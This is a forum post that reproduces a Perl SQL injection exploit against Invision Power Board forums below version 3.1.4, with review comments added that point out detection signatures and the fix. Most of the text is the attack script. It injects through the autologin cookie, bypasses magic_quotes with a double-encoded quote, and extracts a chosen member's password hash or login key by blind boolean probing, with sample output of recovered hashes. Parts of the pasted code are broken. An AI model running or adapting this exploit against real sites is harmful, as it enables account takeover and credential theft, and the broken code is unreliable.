
Exploit Hack Forum IPB> 3.1.4 CP in Perl


SQL Injection Exploit

 

!/usr/bin/perl

## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO :: Socket ;

# NOTE(review): the whitespace inside tokens throughout this listing
# (`@ ARGV`, `$ARGV [ 0 ]`, `IO :: Socket`) looks like a paste artefact of
# the forum post; the code is reproduced below as-is, comments only.
#
# Entry point: a blind, boolean-based SQL injection probe against the IPB
# autologin cookie (see `check`). It recovers one character of the target
# member's stored hash per outer-loop iteration, issuing one HTTP request
# per comparison. Defender view: the traffic is many rapid GET requests to
# `index.php?act=Login&CODE=autologin` from one source whose `pass_hash`
# cookie contains `%2527` (a double-encoded quote) plus a `BETWEEN`/`=`
# clause; that is a usable WAF/log signature. The header above lists
# versions below 3.1.4 as affected.

# Fewer than four positional arguments: print help and exit.
# (`& usage ;` is the old-style call form; it also passes the caller's @_.)
if (@ ARGV < 4 ) { & usage ; }

# Positional arguments: host, install folder, member id to probe, and the
# target version selector (0/1/2 as listed in `usage`).
$server = $ARGV [ 0 ];
$path = $ARGV [ 1 ];
$member_id = $ARGV [ 2 ];
$target = $ARGV [ 3 ];

# Column to read: any non-zero target selects `member_login_key`, only 0
# selects `password` -- targets 1 and 2 therefore behave the same here.
$pass = ( $target )?( 'member_login_key' ):( 'password' );

# Strip a leading scheme so $server is a bare host name.
$server =~ s !( http :\/\/)!!;

# Base URL assembled here is not referenced anywhere else in this listing.
$request = 'http://' ;
$request .= $server ;
$request .= $path ;

# $s_num: 1-based offset of the character currently being recovered.
$s_num = 1 ;
# Autoflush STDOUT so the in-place progress spinner is visible.
$|++;
# $n: number of requests sent so far; drives the spinner in `status`.
$n = 0 ;

print "[~] SERVER : $server \r\n" ;
print "[~] PATH : $path \r\n" ;
print "[~] MEMBER ID : $member_id \r\n" ;
print "[~] TARGET : $target " ;
# As written this line has two `:` in a single conditional expression,
# which is not valid Perl syntax; the post's closing remark about
# "line 72" refers to this line.
print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' ));
print "\r\n" ;
print "[~] SEARCHING PASSWORD ... [|]" ;

# Percent-encode every byte of the member id for use in the Cookie header.
( $cmember_id = $member_id ) =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;

# Main loop: one character offset per iteration. `found` narrows the ASCII
# code by bisection and leaves the result in the global $i; 47..58 brackets
# the digits '0'..'9', 96..122 the lowercase letters (hex digits fall in
# these two ranges; `crack` excludes the upper bound). A result of 0 means
# nothing matched at this offset, which is treated as the end of the value.
while( 1 )
{
if(& found ( 47 , 58 )== 0 ) { & found ( 96 , 122 ); }
$char = $i ;
if ( $char == "0" )
{
if( length ( $allchar ) > 0 ){
print qq {\ b \ b DONE ]

MEMBER ID : $member_id
};
print (( $target )?( 'MEMBER_LOGIN_KEY : ' ):( 'PASSWORD : ' ));
print $allchar . "\r\n" ;
}
else
{
print "\b\b FAILED ]" ;
}
exit();
}
else
{
# One output character appended per recovered offset (chr(42) as pasted).
$allchar .= chr ( 42 );
}
# Advance to the next substring offset.
$s_num ++;
}

# Bisect the ASCII range [$fmin, $fmax] for the character at offset $s_num.
# Each probe asks the server whether the code is BETWEEN the midpoint and
# $fmax (one request per probe, see `check`); once the range is narrower
# than 5 it falls back to the linear scan in `crack`. The result is left in
# the global $i and is also the value of the last expression evaluated,
# which is what the caller in the main loop compares against 0.
# $r and $check are package globals (no `my`), overwritten on each
# recursive call. The `($$)` prototype has no effect on the `&found(...)`
# call form, which bypasses prototypes.
sub found ($$)
{
my $fmin = $_ [ 0 ];
my $fmax = $_ [ 1 ];
# Small range: switch to a linear scan.
if (( $fmax - $fmin )< 5 ) { $i = crack ( $fmin , $fmax ); return $i ; }

# Midpoint of the range; the upper half is tested first.
$r = int ( $fmax - ( $fmax - $fmin )/ 2 );
$check = " BETWEEN $r AND $fmax " ;
if ( & check ( $check ) ) { & found ( $r , $fmax ); }
else { & found ( $fmin , $r ); }
}

# Linear scan: test each code from $cmin up to, but not including, $cmax
# with an equality probe (one request each, see `check`). Returns, and
# stores in the global $i, the first matching code, or 0 if none matched.
sub crack ($$)
{
my $cmin = $_ [ 0 ];
my $cmax = $_ [ 1 ];
$i = $cmin ;
while ( $i < $cmax )
{
$crcheck = "= $i " ;
if ( & check ( $crcheck ) ) { return $i ; }
$i ++;
}
# Nothing in range matched.
$i = 0 ;
return $i ;
}

# Send one probe request and report whether the injected condition held.
# $_[0] is an SQL comparison fragment (`= N` or ` BETWEEN N AND M `) that
# is appended to `ascii(substring(<column>,$s_num,1))`. The whole condition
# travels percent-encoded inside the `pass_hash` cookie of an autologin
# request. Returns 1 if a response line matches the `Set-Cookie: session_id=0`
# pattern below (the server-side signal the author keys on), else 0. Each
# call counts one request in $n and redraws the spinner.
#
# Defender view: every probe reuses the same fixed prefix -- a bogus value,
# `%2527` (the double-encoded quote that survives magic_quotes), `OR (id=`,
# then `AND ascii(substring(` -- so the encoded cookie is a stable string
# to alert on. The durable fix on the application side is parameterised
# queries rather than quote escaping, as the header's magic_quotes remark
# illustrates.
sub check ($)
{
$n ++;
status ();
$ccheck = $_ [ 0 ];
# Percent-encoded `666%27 OR (id=` ...
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D" ;
# ... followed by ` AND ascii(substring(`.
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28" ;
# Column, offset and comparison, then a comment opener to discard the rest
# of the original query; percent-encoded byte by byte afterwards.
$pass_hash3 = $pass . "," . $s_num . ",1))" . $ccheck . ") /*" ;
$pass_hash3 =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;
# Fixed trailer of percent-encoded non-ASCII bytes appended to the cookie.
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20" ;
# Plain TCP connection to port 80 on the target host.
$socket = IO :: Socket :: INET -> new ( Proto => "tcp" , PeerAddr => " $server " , PeerPort => "80" );

# HTTP/1.0 GET carrying the member id and the assembled pass_hash in the
# Cookie header (the encoded member id appears twice: as the cookie value
# and inside the injected `id=` condition).
printf $socket ( "GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n" ,
$path , $server , $cmember_id , $pass_hash1 , $cmember_id , $pass_hash2 , $pass_hash3 , $nmalykh );

# Scan the response line by line for the marker header.
while(< $socket >)
{
if (/ Set - Cookie : session_id = 0 ;/) { return 1 ; }
}

return 0 ;
}

# Redraw the progress spinner in place: overwrite the last two characters
# of the `[|]` marker with the next glyph, cycling / - \ | on $n mod 5.
# When $n % 5 == 4 no branch matches and nothing is printed that call.
sub status ()
{
$status = $n % 5 ;
if( $status == 0 ){ print "\b\b/]" ; }
if( $status == 1 ){ print "\b\b-]" ; }
if( $status == 2 ){ print "\b\b\\]" ; }
if( $status == 3 ){ print "\b\b|]" ; }
}

# Print the help text and exit. Note that the listing as pasted ends at
# `exit();` without the subroutine's closing brace.
sub usage ()
{
print q (
Invision Power Board v < 3.1.4 SQL injection exploit
----------------------------------------------------
USAGE :
~~~~~~
r57ipb3 . pl [ server ] [/ folder /] [ member_id ] [ target ]

[ server ] - host where IPB installed
[/ folder /] - folder where IPB installed
[ member_id ] - user id for brute

targets :
0 - IPB 1. *
1 - IPB 2. *
2 - IPB 3. * ( Prior To 3.1.4 )

e . g . r57ipb3 . pl 127.0.0.1 / IPB / 1 1
----------------------------------------------------
( c ) oded by 1dt . w0lf
RST / GHC , http : //rst.void.ru , http://ghc.ru
);
# Never returns.
exit();

For convenience, change line 72 to

print $target ( ' - IPB 3.*' );
